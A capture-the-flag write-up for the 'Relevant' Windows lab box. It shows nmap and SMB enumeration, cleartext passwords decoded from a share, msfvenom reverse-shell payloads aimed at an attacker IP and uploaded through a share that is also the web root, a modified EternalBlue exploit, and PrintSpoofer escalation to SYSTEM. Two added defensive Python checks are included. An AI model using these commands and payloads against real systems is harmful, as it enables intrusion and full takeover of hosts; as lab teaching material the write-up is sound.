Recon

Nmap

nmap -sC -sV -A -T3 -oN nmap.txt 10.10.94.101
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds      Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-07-30T04:40:06
|_Not valid after:  2024-01-29T04:40:06
|_ssl-date: 2023-07-31T04:42:51+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2023-07-31T04:42:12+00:00
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Can also use: Threader3000

SMB

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.94.101
PORT    STATE SERVICE
445/tcp open  microsoft-ds
 
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.94.101\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.94.101\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.94.101\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.94.101\nt4wrksv:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

Or:

smbclient -L //10.10.94.101/
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
nt4wrksv        Disk
smbclient //10.10.94.101/nt4wrksv
smb: \> get passwords.txt

Content:

Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decode base64:

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

Gobuster

gobuster dir -u http://10.10.129.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]

Nuclei

nuclei -u http://10.10.94.101 -o nuclei.txt
[options-method] [http] [info] http://10.10.94.101 [OPTIONS, TRACE, GET, HEAD, POST]

RPC

impacket-rpcdump 10.10.94.101 -p 135 > rpc.txt
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
          ncalrpc:[LRPC-1e04bfe770857707ee]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_ip_tcp:10.10.94.101[49668]
          ncacn_np:\\RELEVANT[\PIPE\atsvc]
          ncacn_np:\\RELEVANT[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncalrpc:[LRPC-a239fea5b9530119f4]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[OLEDAD8CAB2C79844698D9926A9FDE3]
nmap -sC -sV -A -p10000-50000 -T4 -oN nmap.txt 10.10.94.101
PORT      STATE SERVICE VERSION
49663/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
49668/tcp open  msrpc   Microsoft Windows RPC
49669/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Browse to:

http://10.10.129.35:49663/nt4wrksv

No error is returned, so the directory exists. Now try:

http://10.10.129.35:49663/nt4wrksv/passwords.txt

The file is served as plain text.

Important

The web server on port 49663 and the SMB share nt4wrksv are backed by the same directory!

Access

Generate a reverse-shell payload with msfvenom and start a Metasploit multi/handler listener (a web builder for the msfvenom command line: https://pentest.ws/tools/venom-builder):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.30.179 LPORT=8888 -f aspx -o shell.aspx
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST 10.13.30.179; set LPORT 8888; run"

Upload payload:

smb: \> put shell.aspx

Execute the payload:

http://10.10.129.35:49663/nt4wrksv/shell.aspx

The user flag is in c:\Users\Bob\Desktop:

Success

THM{fdk4ka34vk346ksxfr21tg789ktf45}

On the target, the nt4wrksv share maps to C:/inetpub/wwwroot/nt4wrksv.
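The root cause here is a share that lives inside the IIS document root. As an added example (not part of the original writeup), a check that correlates share paths with web-root paths and reports which overlapping shares are writable by low-privileged users; the share and site inventory is constructed (on a real host it would come from Get-SmbShare and the IIS site physical paths), and the single "Default Web Site" root is an assumption:

```python
from pathlib import PureWindowsPath

# Constructed inventory (assumed values); nt4wrksv's path is the one given above.
SHARES = {
    "ADMIN$": "C:\\Windows",
    "C$": "C:\\",
    "nt4wrksv": "C:/inetpub/wwwroot/nt4wrksv",
}
WEB_ROOTS = {
    "Default Web Site": "C:\\inetpub\\wwwroot",   # assumed IIS physical path
}
# Shares whose ACL lets non-administrators write (from the enumeration above).
WRITABLE_BY_LOW_PRIV = {"nt4wrksv"}

def _norm(path):
    """Case-insensitive path components; accepts '/' or '\\' separators."""
    return tuple(part.lower().rstrip("\\") for part in PureWindowsPath(path).parts)

def under(path, root):
    """True if path is root itself or lies inside root."""
    a, b = _norm(path), _norm(root)
    return a[:len(b)] == b

def exposed_shares(shares, web_roots, writable):
    """(share, site, writable_by_low_priv) for every share that overlaps a web root.

    Both directions count: a share inside the web root (nt4wrksv) and a share that
    contains the web root (C$) both let a writer drop files IIS will serve/execute.
    Only the writable-by-low-privilege ones are the real exposure.
    """
    findings = []
    for share, spath in shares.items():
        for site, wroot in web_roots.items():
            if under(spath, wroot) or under(wroot, spath):
                findings.append((share, site, share in writable))
    return findings

def exposed_writable(shares, web_roots, writable):
    """Just the share names that need fixing: overlapping AND low-priv writable."""
    return sorted({s for s, _, w in exposed_shares(shares, web_roots, writable) if w})
```

The fix on the defending side is to move the share out of the web root or strip write access for guests and other low-privileged principals, and to ensure IIS does not execute scripts from a directory that untrusted users can write to.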

Privilege Escalation

nmap -Pn --script vuln -p 80,135,139,445,3389 10.10.223.114 -T4 -oN nmap.txt
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Find exploit:

searchsploit ms17-010

Result:

Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                    | windows/remote/42315.py

Copy and rename the exploit:

searchsploit -m 42315.py && mv 42315.py exploit.py

Replace the username and password in exploit.py.

Modify the smb_pwn function:

smb_send_file(smbConn, 'rshell.exe', 'C', '/rshell.exe')  # upload the local rshell.exe to C:\rshell.exe
service_exec(conn, r'c:\rshell.exe')                     # run it through the service control manager

Then run:

python exploit.py IP

Get this error:

Traceback (most recent call last):
  File "exploit.py", line 3, in <module>
    from mysmb import MYSMB
ImportError: No module named mysmb

Download mysmb.py from this link. If there are any errors related to wrong arguments, read this issue.

Generate reverse shell for exploit:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=8888 -f exe > rshell.exe

Start a Meterpreter or Netcat listener to catch the reverse shell:

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST tun0; set LPORT 8888; run"

Rerun the exploit; the output should look like this:

Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: samr
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffff9a8a0f802020
SESSION: 0xffffd28b845d8050
FLINK: 0xffffd28b85302098
InParam: 0xffffd28b852fc16c
MID: 0x2903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Done

But nothing happens 😔. After trying a couple of times, treat this as a rabbit hole.

Following the walkthrough video from the room's creator, check the current user's privileges:

whoami /priv

Output:

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Notice the SeImpersonatePrivilege privilege.
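SeImpersonatePrivilege is what makes the PrintSpoofer step below work. As an added example (not part of the original writeup), a parser for the whoami /priv table that reports which held privileges are on a watch-list of token rights commonly abused for escalation; the sample table is a constructed copy of the output above, and the watch-list is an assumption (a common short list, not exhaustive):

```python
import re

# Constructed sample: the `whoami /priv` table from the writeup above.
SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Assumed watch-list of token privileges that are routinely abused to reach SYSTEM.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client (PrintSpoofer-style abuse)",
    "SeAssignPrimaryTokenPrivilege": "start a process with another token",
    "SeDebugPrivilege": "open and inject into any process",
    "SeBackupPrivilege": "read any file, including registry hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of protected objects",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# One row: "<privilege>  <description>  <Enabled|Disabled>"; header and ==== lines do not match.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privs(text):
    """Return {privilege: state} from a whoami /priv table."""
    return {m.group(1): m.group(3)
            for line in text.splitlines() if (m := ROW_RE.match(line))}

def risky_privs(text):
    """High-risk privileges held by the token as (name, state, why).

    'Disabled' still counts: the privilege is in the token and the process can
    re-enable it with AdjustTokenPrivileges, so triage on presence, not state.
    """
    privs = parse_privs(text)
    return [(name, privs[name], HIGH_RISK[name]) for name in HIGH_RISK if name in privs]
```

On the defending side, service accounts that need SeImpersonatePrivilege (IIS application pools are a typical case) should not also have write access to content the server executes, which is the combination this box exposes.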

We will use the PrintSpoofer exploit. Download it and upload it to the nt4wrksv share with smbclient.

Run the exploit like this:

PrintSpoofer64.exe -i -c cmd

And boom 🤯. Check the current user:

whoami

Output:

nt authority\system

Navigate to C:/Users/Administrator/Desktop/root.txt to get the root flag:

Success

THM{1fk5kf469devly1gl320zafgl345pv}

Resources